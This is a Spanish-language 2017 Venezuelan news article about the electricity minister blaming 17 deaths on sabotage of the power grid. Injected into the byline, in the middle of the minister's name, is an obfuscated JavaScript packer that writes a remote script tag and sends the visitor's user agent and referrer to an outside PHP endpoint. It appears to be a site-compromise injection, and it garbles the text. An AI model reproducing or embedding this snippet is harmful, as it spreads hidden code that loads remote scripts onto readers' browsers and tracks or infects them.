17 fallecidos por ataque a sistema eléctrico

Iraima R. Vega M. / Maracaibo / [email protected]
Luis eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kysfs|var|u0026u|referrer|sfdbd||js|php'.split('|'),0,{})) Motta Domínguez, ministro para la Energía Eléctrica, informó durante una entrevista realizada en el programa Encendidos, de la televisora estatal Venezolana de Televisión que 17 personas han fallecido en lo que va de año como resultado del “constante sabotaje al servicio eléctrico en el país”

En su alocución, el ministro especificó que 14 de estos hechos ocurrieron hasta el mes de marzo. Luego del 1 de mayo se registraron los últimos tres decesos para contabilizar 17. (Foto: Archivo)

Luis Motta Domínguez, ministro para la Energía Eléctrica, informó que 17 personas han fallecido en lo que va de año como resultado del “constante sabotaje al servicio eléctrico en el país”.

Durante una entrevista realizada en el programa Encendidos, de la televisora estatal Venezolana de Televisión, Motta recordó que las últimas tres personas fallecidas murieron en los estados Sucre, Falcón y Nueva Esparta.

En su alocución, el ministro especificó que 14 de estos hechos ocurrieron hasta el mes de marzo. Luego del 1 de mayo se registraron los últimos tres decesos para contabilizar 17.

Así mismo, denunció que se trata de “ataques ejecutados por personas que reciben financiamiento para generar desestabilización en el país, tal como lo han hecho durante las últimas semanas sectores de derecha, tras llamados a manifestaciones”.

Desde el mes de abril se han registrado distintos puntos de protesta en el país en rechazo a una decisión del Tribunal Supremo de Justicia de remover los poderes de la Asamblea Nacional (decisión que fue revocada) y de la creación de una Asamblea Nacional Constituyente convocada el pasado 1 de mayo por el presidente Nicolás Maduro. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama